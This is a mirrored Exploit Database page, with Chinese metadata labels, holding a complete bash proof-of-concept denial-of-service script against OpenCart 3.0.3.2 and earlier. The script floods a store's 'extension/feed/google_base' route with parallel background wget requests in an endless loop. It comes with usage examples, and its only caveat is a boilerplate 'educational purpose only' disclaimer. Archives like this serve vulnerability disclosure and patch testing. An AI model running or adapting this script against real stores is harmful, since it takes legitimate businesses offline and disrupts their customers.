Opencart 3.0.3.2 – ‘extension/feed/google_base’ Denial of Service (PoC)

• Exploit Database
• 14 阅读

• 作者： Todor Donev
  日期： 2019-05-24
• 类别：

  • dos
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/46921/

• #!/bin/bash
  #
  #Opencart <= 3.0.3.2 'extension/feed/google_base' Remote Denial of Service PoC exploit
  #
  #Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
  #
  #PoC exploit, just for test...
  #Tested on store with added more than 1000 products
  #Usage: ./cartkiller.sh store_url threads sleep
  #Example: ./cartkiller.sh https://store_name 50 5
  #
  #
  #Disclaimer:
  #This or previous programs is for Educational 
  #purpose ONLY. Do not use it without permission. 
  #The usual disclaimer applies, especially the 
  #fact that Todor Donev is not liable for any 
  #damages caused by direct or indirect use of the 
  #information or functionality provided by these 
  #programs. The author or any Internet provider 
  #bears NO responsibility for content or misuse 
  #of these programs or any derivatives thereof.
  #By using these programs you accept the fact 
  #that any damage (dataloss, system crash, 
  #system compromise, etc.) caused by the use 
  #of these programs is not Todor Donev's 
  #responsibility.
  # 
  #Use them at your own risk!
  #
  
  echo "Opencart <= 3.0.3.2 'extension/feed/google_base' Remote Denial of Service PoC exploit"
  echo
  echo "Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>"
  echo
  echo "PoC exploit, just for test..."
  echo "Tested on store with added more than 1000 products"
  
  if [ -z "$3" ]; then
  echo Usage: "$0" store_url threads sleep
  echo Example: "$0" https://store_name 50 5
  exit 4
  fi
   
  url="$1"
  threads="$2"
  sleep="$3"
  while :
  do
  for ((i=1;i<=$2;i++)); 
  do 	
  	wget "$url/index.php?route=extension/feed/google_base" --user-agent="Mozilla/5.0 (OpenCart Killer v2 google_base Denial Of Service)" --quiet -O /dev/null -o /dev/null &
  done
  #
  # Sleep between loops..
  #
  sleep $sleep
  done